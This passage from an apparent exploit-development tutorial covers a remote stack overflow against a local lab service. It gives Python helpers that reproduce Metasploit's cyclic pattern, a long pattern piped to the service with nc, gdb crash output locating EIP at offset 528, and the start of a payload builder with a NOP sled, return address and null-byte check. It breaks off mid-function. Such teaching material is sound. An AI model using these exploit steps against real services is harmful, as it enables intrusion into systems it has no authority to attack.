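Not part of the original post and not Metasploit's code; it reproduces the
same cyclic pattern so the offsets agree with the Metasploit tools."""
import string
import struct


def pattern_create(length):
    """Cyclic pattern in pattern_create.rb's order: an uppercase letter, a
    lowercase letter and a digit, with the digit changing fastest
    (Aa0Aa1Aa2 ... Aa9Ab0 ...). The pattern does not repeat for the first
    26 * 26 * 10 * 3 = 20280 bytes, so an overwrite can be located."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("a pattern longer than %d bytes would repeat" % len(out))


def pattern_offset(crash_value, length=5000):
    """Offset of the four bytes that ended up in EIP. crash_value is the
    number gdb prints (e.g. 0x41367241); x86 is little-endian, so the bytes
    sat in memory in the reverse order, 41 72 36 41 = b"Ar6A". Returns -1
    if the value did not come from the pattern (e.g. a partial overwrite)."""
    needle = struct.pack("<I", crash_value)
    return pattern_create(length).find(needle)


def marker_bytes_in_eip(crash_value, marker=0x41):
    """Mirrors the manual "A" * n check: how many of the low bytes of the
    crash value are our marker byte. With 528 + 2 A's plus print's newline
    the crash was 0x000a4141, i.e. two of our bytes reached EIP."""
    count = 0
    for byte in struct.pack("<I", crash_value):
        if byte != marker:
            break
        count += 1
    return count


if __name__ == "__main__":
    # Values taken from the gdb sessions on this page.
    print("pattern starts with", pattern_create(5000)[:15].decode())
    print("0x41367241 is at offset", pattern_offset(0x41367241))
    for crash in (0x0804000a, 0x000a4141, 0x41414141):
        print("%#010x: %d marker bytes in EIP" % (crash, marker_bytes_in_eip(crash)))
```

`pattern_offset` returns the first occurrence of the four bytes, which is unambiguous as long as the pattern you sent was shorter than 20280 bytes; for a longer pattern the same four bytes can appear twice and you need a second run with a different length to tell the two apart.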
First we create a pattern of 5000 bytes with `pattern_create.rb`, send it to the server running under gdb, and feed the value EIP holds at the crash to `pattern_offset.rb` to find out where in the pattern the overwrite happened:

```
$ gdb -q ./app-net
Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done.
(gdb) r
Starting program: /home/appuser/app-net
```

```
$ cd /usr/share/metasploit-framework/tools/
$ ./pattern_create.rb 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk
$ echo -n "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk" | nc 127.0.0.1 9999
```

gdb reports:

```
Program received signal SIGSEGV, Segmentation fault.
0x41367241 in ?? ()
```

```
$ ./pattern_offset.rb 41367241
[*] Exact match at offset 528
```

Because x86 is little-endian, the value gdb prints shows the four overwriting bytes in reverse order: in memory they were 41 72 36 41, the string "Ar6A". `pattern_offset.rb` does that byte swap itself, which is why passing it the value exactly as gdb printed it works.

Great! So both methods agree. :-)

## Developing The Exploit

So now to start developing the exploit, which brings us to our second major difference when attacking a remote application.

In parts 1 and 2 we put our [shellcode](https://en.wikipedia.org/wiki/Shellcode) inside an environment variable, but with a network application we don't have that ability, so the shellcode has to reach the server some other way. The most obvious way is to send it as part of our exploit payload, which is what we will do here.

This also brings up another important feature of shellcode development: our payload is being put through `strncpy`, which stops copying at the first null byte (`\x00`) it finds in the source, so a null byte anywhere in the payload will cut our shellcode short and ultimately break the exploit.
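To make those constraints concrete, here is an added Python 3 helper that is not code from the original post: it lays the payload out, refuses anything containing a null byte (because of `strncpy`), and shows how `struct sockaddr_in` is encoded, which is where the `WORD 0x0e27` in the bind shell below comes from. The layout (NOP sled and shellcode inside the 528 bytes, return address after them), the return address 0xbffff5c0 and the placeholder shellcode of `int3` instructions are assumptions chosen for the example, not values from the post; the real bind shell and the real return address are worked out in the text.

```python
#!/usr/bin/env python3
"""Added example: building the remote payload and checking the constraints
the post describes. Not code from the original post; the layout, the return
address and the shellcode below are placeholders chosen for the example."""
import socket
import struct

OFFSET = 528                  # bytes before the saved return address (found above)
TARGET = ("127.0.0.1", 9999)  # the vulnerable service (assumed lab setup)


def has_null(data):
    """strncpy stops at the first 0x00 in the source, so none is allowed."""
    return b"\x00" in data


def build_payload(offset, ret_addr, shellcode, nop=b"\x90"):
    """Assumed layout: [NOP sled][shellcode] padded to `offset` bytes, then
    the return address as a little-endian dword. The sled means ret_addr only
    has to land somewhere in the NOPs, not exactly on the first shellcode byte."""
    if len(shellcode) > offset:
        raise ValueError("shellcode (%d bytes) does not fit before the return address"
                         % len(shellcode))
    body = nop * (offset - len(shellcode)) + shellcode
    payload = body + struct.pack("<I", ret_addr)
    if has_null(payload):
        raise ValueError("payload contains a null byte; strncpy would truncate it")
    return payload


def sockaddr_in(port, addr=0):
    """struct sockaddr_in as the kernel reads it: sa_family in host order,
    sin_port and sin_addr in network (big-endian) order, then 8 bytes of
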